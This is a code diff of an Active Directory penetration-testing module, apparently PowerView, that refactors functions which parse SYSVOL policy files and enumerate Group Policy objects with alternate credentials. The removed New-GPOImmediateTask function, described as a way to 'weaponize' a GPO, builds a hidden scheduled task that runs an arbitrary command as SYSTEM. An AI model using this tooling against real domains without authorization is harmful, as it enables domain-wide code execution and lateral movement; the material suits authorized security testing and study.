-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('gpcfilesyspath', 'Path')]
         [String]
         $GptTmplPath,
 
-        [Switch]
-        $UsePSDrive
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($UsePSDrive) {
-        # if we're PSDrives, create a temporary mount point
-        $Parts = $GptTmplPath.split('\')
-        $FolderPath = $Parts[0..($Parts.length-2)] -join '\'
-        $FilePath = $Parts[-1]
-        $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''
-
-        Write-Verbose "Mounting path $GptTmplPath using a temp PSDrive at $RandDrive"
+    BEGIN {
+        $MappedPaths = @{}
+    }
 
+    PROCESS {
         try {
-            $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath  -ErrorAction Stop
+            if (($GptTmplPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+                $SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL"
+                if (-not $MappedPaths[$SysVolPath]) {
+                    # map IPC$ to this computer if it's not already
+                    Add-RemoteConnection -Path $SysVolPath -Credential $Credential
+                    $MappedPaths[$SysVolPath] = $True
+                }
+            }
+
+            $TargetGptTmplPath = $GptTmplPath
+            if (-not $TargetGptTmplPath.EndsWith('.inf')) {
+                $TargetGptTmplPath += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
+            }
+
+            Write-Verbose "[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath"
+            Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop
         }
         catch {
-            Write-Verbose "Error mounting path $GptTmplPath : $_"
-            return $Null
+            Write-Verbose "[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_"
         }
-
-        # so we can cd/dir the new drive
-        $TargetGptTmplPath = $RandDrive + ":\" + $FilePath
-    }
-    else {
-        $TargetGptTmplPath = $GptTmplPath
     }
 
-    Write-Verbose "GptTmplPath: $GptTmplPath"
-
-    try {
-        Write-Verbose "Parsing $TargetGptTmplPath"
-        $TargetGptTmplPath | Get-IniContent -ErrorAction SilentlyContinue
-    }
-    catch {
-        Write-Verbose "Error parsing $TargetGptTmplPath : $_"
-    }
-
-    if($UsePSDrive -and $RandDrive) {
-        Write-Verbose "Removing temp PSDrive $RandDrive"
-        Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force
+    END {
+        # remove the SYSVOL mappings
+        $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
     }
 }
 
 
-filter Get-GroupsXML {
+function Get-GroupsXML {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Helper to parse a groups.xml file path into a custom object.
 
-        Helper to parse a groups.xml file path into a custom object.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID  
 
-    .PARAMETER GroupsXMLpath
+.DESCRIPTION
 
-        The groups.xml file path name to parse. 
+Parses a groups.xml into a custom object. If -Credential is passed,
+Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds,
+the files are parsed, and the connection is destroyed later with Remove-RemoteConnection.
 
-    .PARAMETER UsePSDrive
+.PARAMETER GroupsXMLpath
 
-        Switch. Mount the target groups.xml folder path as a temporary PSDrive.
+Specifies the groups.xml file path name to parse.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.OUTPUTS
+
+PowerView.GroupsXML
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.GroupsXML')]
     [CmdletBinding()]
     Param (
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Path')]
         [String]
         $GroupsXMLPath,
 
-        [Switch]
-        $UsePSDrive
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($UsePSDrive) {
-        # if we're PSDrives, create a temporary mount point
-        $Parts = $GroupsXMLPath.split('\')
-        $FolderPath = $Parts[0..($Parts.length-2)] -join '\'
-        $FilePath = $Parts[-1]
-        $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''
-
-        Write-Verbose "Mounting path $GroupsXMLPath using a temp PSDrive at $RandDrive"
-
-        try {
-            $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath  -ErrorAction Stop
-        }
-        catch {
-            Write-Verbose "Error mounting path $GroupsXMLPath : $_"
-            return $Null
-        }
-
-        # so we can cd/dir the new drive
-        $TargetGroupsXMLPath = $RandDrive + ":\" + $FilePath
-    }
-    else {
-        $TargetGroupsXMLPath = $GroupsXMLPath
+    BEGIN {
+        $MappedPaths = @{}
     }
 
-    try {
-        [XML]$GroupsXMLcontent = Get-Content $TargetGroupsXMLPath -ErrorAction Stop
-
-        # process all group properties in the XML
-        $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object {
-
-            $Groupname = $_.Properties.groupName
-
-            # extract the localgroup sid for memberof
-            $GroupSID = $_.Properties.groupSid
-            if(-not $GroupSID) {
-                if($Groupname -match 'Administrators') {
-                    $GroupSID = 'S-1-5-32-544'
-                }
-                elseif($Groupname -match 'Remote Desktop') {
-                    $GroupSID = 'S-1-5-32-555'
-                }
-                elseif($Groupname -match 'Guests') {
-                    $GroupSID = 'S-1-5-32-546'
-                }
-                else {
-                    $GroupSID = Convert-NameToSid -ObjectName $Groupname | Select-Object -ExpandProperty SID
+    PROCESS {
+        try {
+            if (($GroupsXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+                $SysVolPath = "\\$((New-Object System.Uri($GroupsXMLPath)).Host)\SYSVOL"
+                if (-not $MappedPaths[$SysVolPath]) {
+                    # map IPC$ to this computer if it's not already
+                    Add-RemoteConnection -Path $SysVolPath -Credential $Credential
+                    $MappedPaths[$SysVolPath] = $True
                 }
             }
 
-            # extract out members added to this group
-            $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {
-                if($_.sid) { $_.sid }
-                else { $_.name }
-            }
+            [XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop
+
+            # process all group properties in the XML
+            $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object {
 
-            if ($Members) {
+                $Groupname = $_.Properties.groupName
 
-                # extract out any/all filters...I hate you GPP
-                if($_.filters) {
-                    $Filters = $_.filters.GetEnumerator() | ForEach-Object {
-                        New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}
+                # extract the localgroup sid for memberof
+                $GroupSID = $_.Properties.groupSid
+                if (-not $GroupSID) {
+                    if ($Groupname -match 'Administrators') {
+                        $GroupSID = 'S-1-5-32-544'
+                    }
+                    elseif ($Groupname -match 'Remote Desktop') {
+                        $GroupSID = 'S-1-5-32-555'
+                    }
+                    elseif ($Groupname -match 'Guests') {
+                        $GroupSID = 'S-1-5-32-546'
+                    }
+                    else {
+                        if ($PSBoundParameters['Credential']) {
+                            $GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential
+                        }
+                        else {
+                            $GroupSID = ConvertTo-SID -ObjectName $Groupname
+                        }
                     }
                 }
-                else {
-                    $Filters = $Null
+
+                # extract out members added to this group
+                $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {
+                    if ($_.sid) { $_.sid }
+                    else { $_.name }
                 }
 
-                if($Members -isnot [System.Array]) { $Members = @($Members) }
+                if ($Members) {
+                    # extract out any/all filters...I hate you GPP
+                    if ($_.filters) {
+                        $Filters = $_.filters.GetEnumerator() | ForEach-Object {
+                            New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}
+                        }
+                    }
+                    else {
+                        $Filters = $Null
+                    }
 
-                $GPOGroup = New-Object PSObject
-                $GPOGroup | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath
-                $GPOGroup | Add-Member Noteproperty 'Filters' $Filters
-                $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
-                $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
-                $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Null
-                $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Members
-                $GPOGroup
+                    if ($Members -isnot [System.Array]) { $Members = @($Members) }
+
+                    $GroupsXML = New-Object PSObject
+                    $GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath
+                    $GroupsXML | Add-Member Noteproperty 'Filters' $Filters
+                    $GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName
+                    $GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID
+                    $GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null
+                    $GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members
+                    $GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML')
+                    $GroupsXML
+                }
             }
         }
-    }
-    catch {
-        Write-Verbose "Error parsing $TargetGroupsXMLPath : $_"
+        catch {
+            Write-Verbose "[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_"
+        }
     }
 
-    if($UsePSDrive -and $RandDrive) {
-        Write-Verbose "Removing temp PSDrive $RandDrive"
-        Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force
+    END {
+        # remove the SYSVOL mappings
+        $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
     }
 }
 
 
-function Get-NetGPO {
+function Get-DomainGPO {
 <#
-    .SYNOPSIS
-
-        Gets a list of all current GPOs in a domain.
-
-    .PARAMETER GPOname
-
-        The GPO name to query for, wildcards accepted.   
-
-    .PARAMETER DisplayName
-
-        The GPO display name to query for, wildcards accepted.   
-
-    .PARAMETER ComputerName
-
-        Return all GPO objects applied to a given computer (FQDN).
-
-    .PARAMETER Domain
+.SYNOPSIS
 
-        The domain to query for GPOs, defaults to the current domain.
+Return all GPOs or specific GPO objects in AD.
 
-    .PARAMETER DomainController
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty  
 
-        Domain controller to reflect LDAP queries through.
+.DESCRIPTION
 
-    .PARAMETER ADSpath
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all GPO objects for
+the current domain are returned. To enumerate all GPOs that are applied to
+a particular machine, use -ComputerName X.
 
-        The LDAP source to search through
-        e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"
+.PARAMETER Identity
 
-    .PARAMETER PageSize
+A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER ComputerIdentity
 
-    .PARAMETER Credential
+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER UserIdentity
 
-    .EXAMPLE
+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
 
-        PS C:\> Get-NetGPO -Domain testlab.local
-        
-        Returns the GPOs in the 'testlab.local' domain. 
-#>
-    [CmdletBinding()]
-    Param (
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $GPOname = '*',
+.PARAMETER Domain
 
-        [String]
-        $DisplayName,
+Specifies the domain to use for the query, defaults to the current domain.
 
-        [String]
-        $ComputerName,
-
-        [String]
-        $Domain,
+.PARAMETER LDAPFilter
 
-        [String]
-        $DomainController,
-        
-        [String]
-        $ADSpath,
-
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200,
-
-        [Management.Automation.PSCredential]
-        $Credential
-    )
-
-    begin {
-        $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
-    }
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-    process {
-        if ($GPOSearcher) {
+.PARAMETER Properties
 
-            if($ComputerName) {
-                $GPONames = @()
-                $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize
+Specifies the properties of the output object to retrieve from the server.
 
-                if(!$Computers) {
-                    throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name"
-                }
-                
-                # get the given computer's OU
-                $ComputerOUs = @()
-                ForEach($Computer in $Computers) {
-                    # extract all OUs a computer is a part of
-                    $DN = $Computer.distinguishedname
+.PARAMETER SearchBase
 
-                    $ComputerOUs += $DN.split(",") | ForEach-Object {
-                        if($_.startswith("OU=")) {
-                            $DN.substring($DN.indexof($_))
-                        }
-                    }
-                }
-                
-                Write-Verbose "ComputerOUs: $ComputerOUs"
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-                # find all the GPOs linked to the computer's OU
-                ForEach($ComputerOU in $ComputerOUs) {
-                    $GPONames += Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $ComputerOU -FullData -PageSize $PageSize | ForEach-Object { 
-                        # get any GPO links
-                        write-verbose "blah: $($_.name)"
-                        $_.gplink.split("][") | ForEach-Object {
-                            if ($_.startswith("LDAP")) {
-                                $_.split(";")[0]
-                            }
-                        }
-                    }
-                }
-                
-                Write-Verbose "GPONames: $GPONames"
+.PARAMETER Server
 
-                # find any GPOs linked to the site for the given computer
-                $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName
-                if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
-                    $GPONames += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object {
-                        if($_.gplink) {
-                            $_.gplink.split("][") | ForEach-Object {
-                                if ($_.startswith("LDAP")) {
-                                    $_.split(";")[0]
-                                }
-                            }
-                        }
-                    }
-                }
+Specifies an Active Directory server (domain controller) to bind to.
 
-                $GPONames | Where-Object{$_ -and ($_ -ne '')} | ForEach-Object {
+.PARAMETER SearchScope
 
-                    # use the gplink as an ADS path to enumerate all GPOs for the computer
-                    $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_ -PageSize $PageSize
-                    $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))"
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-                    try {
-                        $Results = $GPOSearcher.FindAll()
-                        $Results | Where-Object {$_} | ForEach-Object {
-                            $Out = Convert-LDAPProperty -Properties $_.Properties
-                            $Out | Add-Member Noteproperty 'ComputerName' $ComputerName
-                            $Out
-                        }
-                        $Results.dispose()
-                        $GPOSearcher.dispose()
-                    }
-                    catch {
-                        Write-Warning $_
-                    }
-                }
-            }
+.PARAMETER ResultPageSize
 
-            else {
-                if($DisplayName) {
-                    $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(displayname=$DisplayName))"
-                }
-                else {
-                    $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))"
-                }
+Specifies the PageSize to set for the LDAP searcher object.
 
-                try {
-                    $Results = $GPOSearcher.FindAll()
-                    $Results | Where-Object {$_} | ForEach-Object {
-                        if($ADSPath -and ($ADSpath -Match '^GC://')) {
-                            $Properties = Convert-LDAPProperty -Properties $_.Properties
-                            try {
-                                $GPODN = $Properties.distinguishedname
-                                $GPODomain = $GPODN.subString($GPODN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
-                                $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($Properties.cn)"
-                                $Properties | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath
-                                $Properties
-                            }
-                            catch {
-                                $Properties
-                            }
-                        }
-                        else {
-                            # convert/process the LDAP fields for each result
-                            Convert-LDAPProperty -Properties $_.Properties
-                        }
-                    }
-                    $Results.dispose()
-                    $GPOSearcher.dispose()
-                }
-                catch {
-                    Write-Warning $_
-                }
-            }
-        }
-    }
-}
+.PARAMETER ServerTimeLimit
 
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-function New-GPOImmediateTask {
-<#
-    .SYNOPSIS
+.PARAMETER SecurityMasks
 
-        Builds an 'Immediate' schtask to push out through a specified GPO.
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-    .PARAMETER TaskName
+.PARAMETER Tombstone
 
-        Name for the schtask to recreate. Required.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER Command
+.PARAMETER FindOne
 
-        The command to execute with the task, defaults to 'powershell'
+Only return one result object.
 
-    .PARAMETER CommandArguments
+.PARAMETER Credential
 
-        The arguments to supply to the -Command being launched.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER TaskDescription
+.PARAMETER Raw
 
-        An optional description for the task.
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-    .PARAMETER TaskAuthor
-        
-        The displayed author of the task, defaults to ''NT AUTHORITY\System'
+.EXAMPLE
 
-    .PARAMETER TaskModifiedDate
-    
-        The displayed modified date for the task, defaults to 30 days ago.
+Get-DomainGPO -Domain testlab.local
 
-    .PARAMETER GPOname
+Return all GPOs for the testlab.local domain
 
-        The GPO name to build the task for.
+.EXAMPLE
 
-    .PARAMETER GPODisplayName
+Get-DomainGPO -ComputerName windows1.testlab.local
 
-        The GPO display name to build the task for.
+Returns all GPOs applied windows1.testlab.local
 
-    .PARAMETER Domain
+.EXAMPLE
 
-        The domain to query for the GPOs, defaults to the current domain.
+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
 
-    .PARAMETER DomainController
+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
+name of "Test GPO"
 
-        Domain controller to reflect LDAP queries through.
+.EXAMPLE
 
-    .PARAMETER ADSpath
+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
 
-        The LDAP source to search through
-        e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"
+.EXAMPLE
 
-    .PARAMETER Credential
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPO -Credential $Cred
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target.
+.OUTPUTS
 
-    .EXAMPLE
+PowerView.GPO
 
-        PS> New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-c "123 | Out-File C:\Temp\debug.txt"' -Force
+Custom PSObject with translated GPO property fields.
 
-        Create an immediate schtask that executes the specified PowerShell arguments and
-        push it out to the 'SecurePolicy' GPO, skipping the confirmation prompt.
+PowerView.GPO.Raw
 
-    .EXAMPLE
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+#>
 
-        PS> New-GPOImmediateTask -GPODisplayName SecurePolicy -Remove -Force
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [OutputType('PowerView.GPO')]
+    [OutputType('PowerView.GPO.Raw')]
+    [CmdletBinding(DefaultParameterSetName = 'None')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+        [String[]]
+        $Identity,
 
-        Remove all schtasks from the 'SecurePolicy' GPO, skipping the confirmation prompt.
-#>
-    [CmdletBinding(DefaultParameterSetName = 'Create')]
-    Param (
-        [Parameter(ParameterSetName = 'Create', Mandatory = $True)]
-        [String]
+        [Parameter(ParameterSetName = 'ComputerIdentity')]
+        [Alias('ComputerName')]
         [ValidateNotNullOrEmpty()]
-        $TaskName,
-
-        [Parameter(ParameterSetName = 'Create')]
         [String]
-        [ValidateNotNullOrEmpty()]
-        $Command = 'powershell',
+        $ComputerIdentity,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [String]
+        [Parameter(ParameterSetName = 'UserIdentity')]
+        [Alias('UserName')]
         [ValidateNotNullOrEmpty()]
-        $CommandArguments,
-
-        [Parameter(ParameterSetName = 'Create')]
         [String]
-        [ValidateNotNullOrEmpty()]
-        $TaskDescription = '',
+        $UserIdentity,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [String]
         [ValidateNotNullOrEmpty()]
-        $TaskAuthor = 'NT AUTHORITY\System',
+        [String]
+        $Domain,
 
-        [Parameter(ParameterSetName = 'Create')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
+        $LDAPFilter,
+
         [ValidateNotNullOrEmpty()]
-        $TaskModifiedDate = (Get-Date (Get-Date).AddDays(-30) -Format u).trim("Z"),
+        [String[]]
+        $Properties,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $GPOname,
+        $SearchBase,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $GPODisplayName,
+        $Server,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $Domain,
+        $SearchScope = 'Subtree',
 
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]
-        [String]
-        $DomainController,
-        
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
         [String]
-        $ADSpath,
+        $SecurityMasks,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]
         [Switch]
-        $Force,
+        $Tombstone,
 
-        [Parameter(ParameterSetName = 'Remove')]
+        [Alias('ReturnOne')]
         [Switch]
-        $Remove,
+        $FindOne,
 
-        [Parameter(ParameterSetName = 'Create')]
-        [Parameter(ParameterSetName = 'Remove')]        
         [Management.Automation.PSCredential]
-        $Credential
-    )
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-    # build the XML spec for our 'immediate' scheduled task
-    $TaskXML = '<?xml version="1.0" encoding="utf-8"?><ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}"><ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="'+$TaskName+'" image="0" changed="'+$TaskModifiedDate+'" uid="{'+$([guid]::NewGuid())+'}" userContext="0" removePolicy="0"><Properties action="C" name="'+$TaskName+'" runAs="NT AUTHORITY\System" logonType="S4U"><Task version="1.3"><RegistrationInfo><Author>'+$TaskAuthor+'</Author><Description>'+$TaskDescription+'</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><AllowStartOnDemand>false</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter><RestartOnFailure><Interval>PT15M</Interval><Count>3</Count></RestartOnFailure></Settings><Actions Context="Author"><Exec><Command>'+$Command+'</Command><Arguments>'+$CommandArguments+'</Arguments></Exec></Actions><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers></Task></Properties></ImmediateTaskV2></ScheduledTasks>'
+        [Switch]
+        $Raw
+    )
 
-    if (!$PSBoundParameters['GPOname'] -and !$PSBoundParameters['GPODisplayName']) {
-        Write-Warning 'Either -GPOName or -GPODisplayName must be specified'
-        return
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $GPOSearcher = Get-DomainSearcher @SearcherArguments
     }
 
-    # eunmerate the specified GPO(s)
-    $GPOs = Get-NetGPO -GPOname $GPOname -DisplayName $GPODisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -Credential $Credential 
-    
-    if(!$GPOs) {
-        Write-Warning 'No GPO found.'
-        return
-    }
+    PROCESS {
+        if ($GPOSearcher) {
+            if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) {
+                $GPOAdsPaths = @()
+                if ($SearcherArguments['Properties']) {
+                    $OldProperties = $SearcherArguments['Properties']
+                }
+                $SearcherArguments['Properties'] = 'distinguishedname,dnshostname'
+                $TargetComputerName = $Null
+
+                if ($PSBoundParameters['ComputerIdentity']) {
+                    $SearcherArguments['Identity'] = $ComputerIdentity
+                    $Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1
+                    if(-not $Computer) {
+                        Write-Verbose "[Get-DomainGPO] Computer '$ComputerIdentity' not found!"
+                    }
+                    $ObjectDN = $Computer.distinguishedname
+                    $TargetComputerName = $Computer.dnshostname
+                }
+                else {
+                    $SearcherArguments['Identity'] = $UserIdentity
+                    $User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1
+                    if(-not $User) {
+                        Write-Verbose "[Get-DomainGPO] User '$UserIdentity' not found!"
+                    }
+                    $ObjectDN = $User.distinguishedname
+                }
 
-    $GPOs | ForEach-Object {
-        $ProcessedGPOName = $_.Name
-        try {
-            Write-Verbose "Trying to weaponize GPO: $ProcessedGPOName"
+                # extract all OUs the target user/computer is a part of
+                $ObjectOUs = @()
+                $ObjectOUs += $ObjectDN.split(',') | ForEach-Object {
+                    if($_.startswith('OU=')) {
+                        $ObjectDN.SubString($ObjectDN.IndexOf($_))
+                    }
+                }
+                Write-Verbose "[Get-DomainGPO] object OUs: $ObjectOUs"
+
+                if ($ObjectOUs) {
+                    # find all the GPOs linked to the user/computer's OUs
+                    $SearcherArguments.Remove('Properties')
+                    $InheritanceDisabled = $False
+                    ForEach($ObjectOU in $ObjectOUs) {
+                        if ($InheritanceDisabled) { break }
+                        $SearcherArguments['Identity'] = $ObjectOU
+                        $GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object {
+                            # extract any GPO links for this particular OU the computer is a part of
+                            $_.gplink.split('][') | ForEach-Object {
+                                if ($_.startswith('LDAP')) {
+                                    $_.split(';')[0]
+                                }
+                            }
 
-            # map a network drive as New-PSDrive/New-Item/etc. don't accept -Credential properly :(
-            if($Credential) {
-                Write-Verbose "Mapping '$($_.gpcfilesyspath)' to network drive N:\"
-                $Path = $_.gpcfilesyspath.TrimEnd('\')
-                $Net = New-Object -ComObject WScript.Network
